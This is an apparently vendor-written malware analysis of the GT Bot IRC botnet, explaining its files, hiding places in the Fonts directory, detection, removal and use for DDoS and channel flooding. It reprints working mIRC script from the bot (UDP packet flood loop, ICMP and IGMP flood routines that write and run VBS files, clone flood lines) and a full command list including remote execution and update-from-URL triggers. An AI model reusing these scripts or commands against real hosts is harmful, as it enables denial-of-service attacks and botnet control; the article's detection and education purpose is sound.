GT Bot (Global Threat)

GT Bot (Global Threat) first appeared nearly two years ago and was written by Sony, mSg and DeadKode. The GT Bot uses the legitimate mIRC program as its main core and a program called HideWindow to make mIRC invisible to the host computer. mIRC is scripted to create an IRC Bot which responds to remote commands from the Bot Master. When run mIRC loads the scripts and the HideWindow program and connects to the predetermined IRC server and channel to await commands. As the scripts are open source it is very easy to rewrite or edit them with your own variations and custom command triggers. This is done often and accounts for the wide amount of variants of this bot. Some have undergone simple edits and others are far more creative with additional scripts and routines, some even have encryption added to protect logins and access to commands. In some places GT Bot has also been referred to as Aristotles or IRC Trojan Aristotles, this is still GT Bot though and was called Aristotles as a variant that was widespread was controlled by the nickname Aristotles. The most popular variant of GT Bot uses the filenames that are listed below.

temp.exe (This is mIRC32.exe)
temp2.exe (This is HideWindow)
mirc.ini (The main *.ini)
mirc2.ini (script)
mirc3.ini (script)
script.ini (script)
pr.ini (script)
gates.txt (script)
temp.scr (nicknames list)
WHVLXD.DAT (registry key info)
WHVLXD.EXE (registry key creator)

A more complete list of known GT Bot filenames that will help indicate a possible infection here

As drawn attention to earlier, many variants exist and it is all too easy to change the names of the files and the filename extensions. One filename that endures through nearly every version is MIRC.INI as by default mIRC needs this file to load properly and if it does not find one, it would create a new one which would stop the Bot from launching. A search of the hard drive for mirc.ini would reveal the location of each copy of mIRC as the two must both exist in the same directory. If you have one version of mIRC installed and a search reveals two mirc.ini files, it is possible you have a GT Bot infection. Simply counting the number of mirc.ini files against the number of mIRC versions you can account for can reveal a lot of these infections easily. mIRC can be hex edited to look for a different file other than mirc.ini when it is loaded and I have seen this done in a few cases and have examples of this variant. A very small percentage have done this, so the mirc.ini search is always the best initial method to use when looking for a GT Bot infection. One example of a bot that had been hex edited to load a file other than mirc.ini used the filename slave.fnt along with many other files with the made up *.FNT extension. I will be listing a lot of default names that these files create so that it provides a useful reference when searching. However, this is not a fixed and set in stone guide, because names and extensions are so easy to change and are often changed.

GT Bots are also installed into various paths, with the most popular ones being the Windows and the Windows/System directories. Some of the smarter versions of GT Bot hide in the C:\Windows\Fonts directory and for a good reason. If you opened the C:\Windows\Fonts directory in normal view, you would not see executables, scripts or other directories in there. It has become a popular hiding place for GT Bot. Windows Explorer would show these hidden files or directories and so would MSDOS mode. I will provide examples below.

To find hidden directories in the fonts directory, go to the C:\ drive and open the Windows directory and then open the Fonts directory. Leaving Fonts as the focused Window on the top, click on the Windows Start button and go to Run. A run prompt will appear and you need to type the word "command" without the quotes into the box and click OK. You should see an MSDOS prompt window appear showing C:\Windows\Fonts>. Now type "DIR/P/W" without the quotes and you will see a directory listing. Look closely for names in [ ] as these indicate directories. You should see [ . ] and [ .. ] which can be disregarded, but beware of any other directories in there. In the illustration below, you will see [ GTBot ] which was a directory I created in there as an example by doing "mkdir GTBot" Often with GT Bot infections a directory called FONT will exist inside the real Fonts directory which is where the Bot is often hidden. To access this in a normal view go to Start and then Run and type the full path. For example C:\Windows\Fonts\GTBot and click OK and it will open that directory. A lot of the files will be hidden files, so it is wise to use folder options to show hidden and system files and file extensions for known file types. Some bots are a little more devious and will create a directory inside of Fonts with a name like VerdanaLarge.ttf so at a quick glance, it looks like a font file, but the [ ] around the name will always give it away as a directory and you should take note of this. Images 1 | 2

To enable view all files and extensions, click on Start then Settings and then Folder Options. see figure1 The Folder Options window should then appear see figure2 Click on View the centre one of the three tabs. Then check the Show All Files radio button and uncheck the Hide file extensions for known types check box.

If a GT Bot is found it can be dealt with in a few ways. One of which is to use a process viewer and kill the hidden processes that it is running and then delete all of the files. Alternatively, a Trojan scanner will sometimes detect some of the files and remove them. Remember, as GT Bot is so widespread and easy to edit, many variants will exist that could not possibly be detected by standard signature file scanning and this is why the use of a process monitor is always by far the best method from my own experiences in dealing with dozens of these GT Bots.

When GT Bots connect to IRC, they are usually logged into by their Master who will then issue them with commands.You will get a clearer picture of this, by looking at the screen captures [URL] which show various activity from spamming and flooding to all out DDoS attacks. A lot can be learned about the structuring of BotNets, by observation if you are able to track them down. Typically, GT BotNets can be traced in only a matter of minutes by reading the script files after the Bot package has been executed and extracted. All of the connection information is within the scripting and often in the remote.ini. The IRC server address which is usually a dynamic address, channel to join the nickname ident and real name criteria for the Bot to assume when executed. Dynamic addresses are often used, so BotNets can be redirected to other IRC servers and I have explained more about Dynamic addresses [here URL] because they are relevant to all types of bots. On IRC servers that are owned and operated by the BotNet Master, great lengths are often taken in order to hide the channel that the Bots join and to secure it from curious people accidentally finding or stumbling across it.

Often, channel names are used, which contain special characters such as #Ãßÿ¥¤¢š¿øùô with a channel key that again uses special characters like ¥ðæÅÞ ‡. So to join the channel you would have to type /join #Ãßÿ¥¤¢š¿øùô ¥ðæÅÞ ‡ which is /join <#chan> <key>. I explain IRC modes and what they do with more relevant information [hereURL] as again it applies to all genre of Bots. The IRCD (IRC Server Software) of choice is usually Unreal IRCD [URL http://www.unrealircd.com] as it is easy to set up and configure and has some rather unique modes unavailable in other similar IRCD software, modes that include +u which hides the user nicknames list from anyone that joins the channel, giving the appearance that the channel is completely empty and host masking in order to stop a person from obtaining IP addresses. Even if the channel had several hundred Bots in it, they would remain invisible, unless you know the workarounds which I describe in the IRC modes section.

Once logged into, the Bots can be commanded with trigger commands sent to the IRC channel. The bot will normally respond to certain trigger words that the script is monitoring the channel for. For example, here is a snippet of code from a GT Bot and an explanation of what it does.

if ($1 == !icqpage) { if ($2 == $null) { /msg # Error/Syntax:(!icqpage from subject body to) | halt } { .set %icqfrom $2- | .set %icqsubject $3- | .set %icqbody $4- | .set %icqto $5 |
.sockclose mICQ* | .timer 1 3 .sockopen mICQ wwp.icq.com 80 } }

When a Bot Master sends the text "!icqpage from_me the_subject a_pager_for_you 111111111111" the Bot will open a connection to wwp.icq.com on remote port 80
and send that string of information and even prompt the user if they mis-entered the information. Each time that command is sent, ICQ account 111111111111 would get one WWW Pager from each Bot. Several hundred Bots doing this repeatedly, would generate quite a huge flood of these pagers. At the receiving end, they can easily all be closed all at once or added to ignore, but it is still somewhat annoying to the target. Worse are the DDoS attacks these can create, with various different types of built in attacks. I will briefly try and explain some of them below.

Packet Of Death : This piece of code generates UDP packets to random ports in the range 1000 - 6669 of user inputted size and amount "!packet 10.0.01 9999 3000" would attempt to send 9999 bytes of data 3000 times to IP Address 10.0.01 on random ports between the ranges of port 1000 to port 6669. Once again, if the information is added incorrectly, the GT Bot will message the channel and report the correct syntax to use. When the attack has finished, the GT Bot will message the Master that it has completed it's task and is ready to accept further orders.

alias packetofdeath {
if ($3 = $null) { notice $nick Error Please use !packet address size amount | halt }
if ($chr(46) !isin $1) || ($2 !isnum) || ($3 !isnum) { notice $nick Error Please use !packet address size amount | halt }
if ($remove($1,$chr(46)) !isnum)
{ notice $nick Error no letters may be contained in the ip | unset %packet.* | halt }
.notice $nick Now Packeting $1 with $2 bytes $3 times
set %packet.ip $1
set %packet.bytes $2
set %packet.amount $3
set %packet.count 0
set %packet.port $rand(1,6) $+ $rand(0,6) $+ ($rand(0,6)
$+ $rand(0,9)
:start
if (%packet.count >= %packet.amount) { sockclose packet | unset %packet.* | .notice $nick Packeting has completed | halt }
inc %packet.count 1
/sockudp -b packet 60 %packet.ip %packet.port %packet.bytes
%packet.bytes
goto start

ICMP an ICMP attack allowing variable sizes of packets and amounts which uses writes and runs a VBS file that then runs PING.EXE with parameters. This piece of code, on command, sends a ping flood of user definable size and amount to the target IP Address. As you can most likely imagine, it hardly takes a genius to figure out that many machines sending a lot of malicious traffic, can easily cause chaos and take down high bandwidth targets very effectively, even if they are denying the ICMP at the router. This has the effect like someone snorkel diving. If your snorkel becomes full of water, you can close your mouth to stop yourself swallowing the water but you still cannot breathe.

This form of attack, is generally referred to as a bandwidth saturation attack, because it stops any useful data from getting in or out as it completely fills the pipes. When this command is run, it removes icmp.vbs if it exists and writes a new file called icmp.vbs which it will then run. Once icmp.vbs has been run, it in turn runs PING.EXE with the parameters

"PING -N <Number of Packets> -L <Size in Bytes> -W 0 <IP Address of Target>"

The Parameter -W is set at 0 which is timeout to wait for a reply before sending the next ping echo request, meaning it will send a constant stream instead of waiting for a reply to the last echo. See image here

To this form of attack, a firewall would stop the Pings reaching the machine and the machine would run normally behind the firewall unaffected by the attack only with no real communication with the Internet, effectively silenced or offline to anybody trying to access it remotely, which if it is a machine providing web services, such as a website, it can be catastrophic financially to a business with the web site completely unaccessible. It might as well be switched off or unplugged from the network, because the attack rages on. Most DDoS attacks die out eventually, usually when the attacking machines go offline or the owner realizes that they are attacking someone. Of course, attacks such as this, can be successfully filtered upstream of the target by the Internet Service or Upstream Provider, as long as the specific attack can be identified and a ruleset crafted for it.

It would be worth checking any machine for the existence of ICMP.VBS to make sure it is not taking part in malicious attacks.

if ($1 == !icmp) { if ($2 == $null) { /msg # E rror/Syntax:(!icmp ip packetsize howmany, ie: !icmp 127.0.0.1 2000 1000) | halt }| .remove icmp.vbs | .write icmp.vbs Set src3 =
CreateObject("Wscript.shell") | .write icmp.vbs src3.run "command /c ping -n $4 -l $3 -w 0 $2 ",0,true | .run icmp.vbs }

IGMP is an attack that uses a third party DOS based IGMP tool to send malicious Fragmented IGMP Packets to the target machine. This routine is almost identical to the above, only it runs a third party tool called IGMP.EXE which has preset parameters and only needs the IP address to be inputted. Fragmented IGMP packets will often cause un-patched Windows 98 users to BSoD (Blue Screen of Death) or in some cases cause their computer to force reboot. This form of attack will again saturate bandwidth, even if the target is protected from IGMP Protocol Packets. As shown above, a search for IGMP.VBS and IGMP.EXE is always worthwhile to make sure that the machine is not being made to send malicious traffic to third parties.

if ($1 == !igmp) { if ($2 == $null) { /msg # Error/Syntax:(!igmp ip.here) | halt } | .remove igmp.vbs | .write igmp.vbs Set src3 = CreateObject("Wscript.shell") | .write igmp.vbs src3.run "command /c igmp $2 ",0,true | .run igmp.vbs }

Other similar attacks that are often included are Pepsi, Shiver, Fraggle and ATH0 (Aimed at machines with dialup connection. AT H & 0 are the commands to hang up the modem "disconnect")

The GT Bot is also used very largely to attack other IRC Networks by flooding channels with huge amounts of text or messages to individual users. A lot of these attacks, on a small scale can be ignored, but on a large scale they cause wide scale IRC Server disruption and in many instances with lower bandwidth providers will down the whole server and any others running on the same network.

IRC.DAL.NET arguably the largest IRC Chat Network have been plagued with many different genre of these GT Bot as well as many other varieties. They have a dedicated team of IRC Operators forming the DALnet Exploits Team which work almost full time, dealing with BotNets and other malicious traffic. DALnet currently boasts over 600,000 registered users and over 80,000 concurrent chatters. [http://www.dal.net/index.php3]

We have many times had the pleasure of working closely with the DALnet Exploits team in the role of consultant, to examine new BotNets and make sense of what the thing actually is and does and how it gets it's instructions and what steps could be taken to get rid of it and deter more from arriving. This has given me much opportunity to further my studies of BotNet structuring, protocol and behavior and allowed me to see possible solutions
to certain problems. Channels are generally secured and closed off to stop more Bots from joining or to stop people from exploiting these infected machines. We also interviewed a few members of DALnet Exploits Team and you can read what they had to say about the problem from their own experiences.
| Fruit^Loop | Barbara | Melech |

DALnet has a responsible attitude towards exploits and feel that prevention is always better than cure and educating the users is by far the best policy they could possibly adopt. Much of the work that the Exploits Team carry out is confidential and I will not be discussing the techniques that are adopted to detect exploit channels or the policies that are in force to prevent exploited hosts from connecting. DALnet has many times been flooded by CLONES
(Bots spawning more offspring by multiplying themselves)

If a BotNet of 200 GT Bots created 5 clones each to join an IRC Server that would generate a total of 1000 connections. Most small IRC Servers allow 256 simultaneous connections up to a maximum of 1024. A large amount of this form of traffic rapidly uses all of the available ports and in a lot of cases the whole lot hitting almost all at once will stall the whole Server. GT Bot often enter an IRC in huge amounts and then join target channels and flood them with endless repetitive data, which causes normal users to become disconnected or their IRC client to freeze, because it cannot process the rapidly scrolling flood of garbage data fast enough. These kinds of floods often run up to 150 kbps of data through the IRC Server and will often incur the owner of the free service penalties for extra bandwidth consumption.

If IRC Servers are repeatedly attacked, the hosting company will often terminate the account, which is really a case of the victim being further victimized, but the hosting company does have a responsibility to it's other users to maintain a reasonable level of useful service. In the case of DALnet, many IRC Servers were de-linked from the network, after a torrent of different attacks as the Administrators could not cope with the constant deluge of packets and clone floods.

A variant of GT Bot was in the process of creation by BootError with a client to control it. The application was never actually completed or distributed, but it caused quite a stir when it was suggested that it might be used to take down DALnet here Followups to the incident can be found here reporting the arrest of the 16 year old BootError by the FBI concerning the Gods Wrath affair. No charges have actually been brought against BootError as of yet even after the several month investigation although it is still pending. It was widely covered by the media at the time and also widely exaggerated, that it was a scheme to take down the entire Internet.

A few hundred or even a few thousand GT Bots can certainly do an awful lot of damage, but to take down the whole Internet is about a million times exaggerated. Given that this tool had but one day to be spread, it would be a near impossibility and you would stand more chance of winning the lottery 3 times consecutively than seeing it happen.

From my own personal studies of BotNets, I have seen many evolve and grow from nearly nothing, because I have sometimes found them within hours of their first being created. By far, the most successful and largest BotNets that have grown the most rapidly, have been ones that exploited some other exploit, by acting like a Worm or infection of insecure Windows 2000 IIS Servers (Internet Information Server) or the infection of hosts with existing Trojan infections, such as SubSeven. [Interview with mobman the SubSeven Author here URL] Below is a paste of some of the garbage data that Bot FloodNets often send to IRC channels and users. If you can imagine this data being sent constantly over and over again by a large amount of Clones, until the attack is called off or the IRC Server goes offline.

On larger networks such as DALnet, server floods are detected and channel or server flood protection is automatically activated to allow IRC Operators the chance to try and get on top of the attacks and disconnect the rogue attacking machines from the network and implement bans to stop the same host from reconnecting. This is why gates.txt is often an inclusion with GT Bot. Gates.txt is a list of port 1080 (Wingate Proxies) which clones are often loaded onto and fast *.EDU hosts can often produce very large numbers of these clones.

Pure Pewp
/timer 1 5 /sockwrite -n $sock(clone*,%cc) PRIVMSG $2
p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w pp e wp p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p p e w p

Death by Math
/timer 1 16 /sockwrite -n $sock(clone*,%cc) PRIVMSG
$2 ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼
½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾ ½ ¼ ½ ¾ ½¼ ½¾

GT Special
/timer 1 22 /sockwrite -n $sock(clone*,%cc) PRIVMSG $2
3GT 4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT
4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT4SP E C I AL 12 3GT 4SP E C I AL 3GT

Often BNC (Bounce For IRC) is used to load clones onto IRC Networks and works in a very similar way to loading clones via a WinGate. This is done to evade various bans, which may be in effect and to be able to reconnect clients from banned hosts or domains.

These bots have nearly the same capability as common middle of the range Trojans and can get various information about the system it is installed to and output it to an IRC channel. An example can be seen below of a version that we tested on one of our laboratory machines.

Info Date:[Monday September 10 2001] Time:[09:42 pm] OS:[Windows98] UpTime:[55mins 36secs] Current-URL:[http://pv1fd.pav1.hotmail.msn.com/cgi- bin/HoTMaiL?
curmbox=F000000001&a=853e1cbe0240dc4d970aac200fec8216&_lang=EN]
Name: LockDownLaboratory()ICQ:[1111111111.uin] Key[H922W2R887TH2KDDPCP9F8FDH]

ICQ Number and Windows product key edited for security purposes.

Other information can also be easily gathered including size of logical drives, space used and remaining space. Connection type and up and down speed available ram and cpu speed. This is usually done by adding ready made *.dll files such as, moo.dll or info.dll to the package and calling the *.dll and outputting the result to the Bot channel. Many bots also search for media files such as,*.mpg *.mpeg*.rm *.ram *.mp3 and serve on IRC as fileservers or can just open an fserv on drive C:\ or any other available drive. (FServ is the IRC equivalent to FTP only it is a read only service)

The ability ro delete or run commands and files is also usually an inclusion in GT Bot and many also have a Web Downloader included so it can be run on command and fetch a predetermined update or new version and then install it. Some have the ability to write new scripts, so all the Master has to do is give the GT Bot a new script to load by pasting it line by line into the channel. The Bot will then write the script and it can be loaded and the new added commands become accessible.

GT Bot is often used to scan for Trojan compromised hosts and then outputs the IP Address of any hosts found into the channel. Some even go as far as to connect to SubSeven infections and make them updated from the web with a GT Bot which once successfully downloaded, will be run and will remove the SubSeven infection and replace it.

Conclusion

It can be safely concluded that the spread of these Bots and the number of variants is set to increase significantly in the next year or so, until the public as a whole becomes more aware of the threat and takes proper action to avoid infection. With the increase in the number of BotNets there will also be an increase in the number of DDoS attacks reported as the two go hand in hand together. It is evident that awareness and education is the best policy that can be adopted.

 

Some of the standard commands from GT Bot can be seen below.

!portredirect
!portredirect help
!portredirect add <localport> <remotehost|ip> <remoteport>
!portredirect stop <localport>
!portredirect stats

!pfast
usage: (udp flood)
!pfast stop
!pfast <number of packets> <dest host> <dest port>

!var
usage:
!var <mirc internal variable>

!stopscan
no usage, stops all scans.

!scan
usage:
!scan <ip.*> <port>
!scan 1.1.1.* 31337

!quit
(will make mirc /quit if the address of the user = %master)
usage:
!quit <msg>

!fileserver.access
no usage, if the the address of the user = %master, then they can spawn an fserve from the root of C:\.

!up
attempts to op the $nick in the current channel.

!exit
masteraddy, then the client will exit.

!max.load
usage:
sets the maximum number of clones.
!max.load <number>

!mode
usage:
sets a mode on a channel or nick.
!mode <#channel|nick> <+|-|smkiplnb> <address>

!voiceme
no usage, attempts to get voice on the current channel.

!down
no usage, attempts to deop, and voice on the current channel.

!avoice
usage:
adds/removes a nick from the autovoice list.
!avoice <add|del> <nick>

!aop
usage:
adds/removes a nick from the autoop list.
!aop <add|del> nick

!add.user
usage:
adds a user at level 10, if $address matchs %master.
!add.user <nick>

!add.alias
usage:
attempts to add an alias for mirc.
!add.alias <new alias>

!rem.user
usage:
removes a user from level 10, if $address matchs %master.
!rem.user <nick>

!packet
usage:
starts a denial of service (ping.exe) attack on a specified ip, if $address matchs %master.
!packet <ip> <number>

!clone.status
no usage, provides statistics on the number of clones currently loaded.

!jump-server
tells the client to jump irc server if the $address matchs %master.
usage:
!jump-server <server> <port>

!add.server
tells the client to add an irc server to its server list, if the $address matchs %master.
usage:
!add.server <host|ip> [port] [password]

!server.list.clear
no usage, tells the client to remove the server list (servers.txt), if the $address matchs %master.

!reload!
no usage, tells the client to reconnect to the current irc server in 15seconds, if the $address matchs %master.

!wingate.load
no usage, loads a wingate floodnet using the wingates in gates.txt.

!join
usage:
!join <#channel>

!part
usage:
!part <#channel>

!cycle
parts then joins a selected channel.
usage:
!cycle <#channel>

!op,!deop,!devoice,!voice
attempts to op/deop/devoice/voice a user in a certain channel.
usage:
!op <#channel> <nick>
!deop <#channel> <nick>
!devoice <#channel> <nick>
!voice <#channel> <nick>

!kick
attempts to kick a user from a certain channel.
usage:
!kick <#channel> <nick> <message>

!info
no usage, gives information about the client such as:
date, time, os (which type of windows), uptime, number of .mp3s, number of .exe's, number
of .mpg's, number of .asf's and which url the client it currently viewing.

!kick/ban
attempts to kick and ban a user from a certain channel if the $address matchs %master.
usage:
!kick/ban <#channel> <nick> <message>

!clone.flood.ctcp.all
attempts to flood a user|channel with ctcp requests.
usage:
!clone.flood.ctcp.all <#channel|nick>

!clone.flood.ctcp.version
attempts to flood a user|channel with ctcp version requests.
usage:
!clone.flood.ctcp.version <#channel|nick>

!clone.flood.ctcp.ping
attempts to flood a user|channel with ctcp ping requests.
usage:
!clone.flood.ctcp.ping <#channel|nick>

!clone.flood.ctcp.time
attempts to flood a user|channel with ctcp time requests.
usage:
!clone.flood.ctcp.time <#channel|nick>

!clone.service.killer
no usage, attempts to flood ChanServ and NickServ by registering random channels and nicknames.

!clone.load
attempts to load a set amount of clones on a selected server.
usage:
!clone.load <hostname|ip> <port> <number of clones>

!clone.load.random
attempts to load a certain amount of clones into a random server.
usage:
!clone.load.random <hostname|ip> <port> <number>

!clone.part,!clone.join
attempts to get the clones to join/part a certain channel.
usage:
!clone.part <#channel>
!clone.join <#channel>

!clone.dcc.chat,!clone.dcc.send
attempts to flood a user with dcc send's/chats
usage:

!clone.dcc.chat <nick>
!clone.dcc.send <nick>

!nick
attempts to change the nickname of the clones to <$2><random number>
!nick <nickname>

!clone.join
attempts to get the clones to join a certain channel.
usage:
!clone.join <#channel> [key]

!msg
attempts to get the client to send a privmsg to a nick or channel.
usage:
!msg <#channel|nick> <text>

!clone.cycle
attempts to get all the clones to part/join a certain channel.
usage:
!clone.cycle <#channel>

!clone.msg
attempts to get the clones to send a privmsg to a nick or channel.
usage:
!clone.msg <#channel|nick> <text>

!clone.quit
attempts to make all the clones quit irc.
usage:
!clone.quit [message]

!clone.notice
attempts to make all the clones send a notice to a nick or channel
usage:
!clone.notice <#channel|nick>

!clone.nick.flood
no usage, attempts to get the clones to nickflood.

!clone.nick) { if ($2 == $null) { halt } | /clone nick.this $2 }

!clone.kill
attempts to kill all the clones.

!clone.combo1,!clone.combo2,!clone.combo2,!clone.combo4,!clone.combo5,!clone.
combo6,!clone.combo#,!clone.combo.word,!clone.combo.ultimate
various types of privmsg floods using bold and colour control characters.

!clone.c.flood
constant flood, sets a timer to continually flood a channel or nick.

!flood.stop
stops the above flood.

!super.flood
another flood type.

!super.flood.stop!
stops the above flood.

!ver
shows the version number of the "Remote flooder", in this case version: 0.9.0.1

!credits
shows the credits, presumably the authors, in this case: DK,\mSg,Sony

!-
executes any command on the remote computer/mirc client if the $address matchs %master.

!bnc
usage:
!bnc stats, shows statistics for the bnc.
!bnc log, starts logging to bnc.log if $address is %master.
!bnc start <port> <password>, starts a bnc on <port> with <password>
!bnc stop <port>, kills the listening bnc on <port>
!bnc kill users, if $address is %master, it kills all listening and active bnc's.
!bnc shutdown, if $address is %master, it shutsdown the bnc server.
!bnc list bnc, lists all the listening bnc ports.
!bnc list users, lists all the users currently using the bnc(s).
!bnc list servers, lists all connects to remote servers.

!icqpagebomb
usage:
floods a certain user(uin) on ICQ. via www.icq.com
!icppagebomb <uin> <amount> <email/name> <sub> <message>

!login <interesting one>

usage:
"!login Wasszup!" adds your *!*ident@*.host.com as level 10.
"!login grrrr yeah baby!" sets you as %master

!portscan
usage:
!portscan <ipaddress> <startport> <endport>

!update
attempts to get an update from a webpage, if your address matchs %master.
usage:
!update <url>

You can download and try SwatIt now free of charge by clicking
on the download link on the left.

Infected With Karma Worm and Sending Spam Messages
on IRC? click here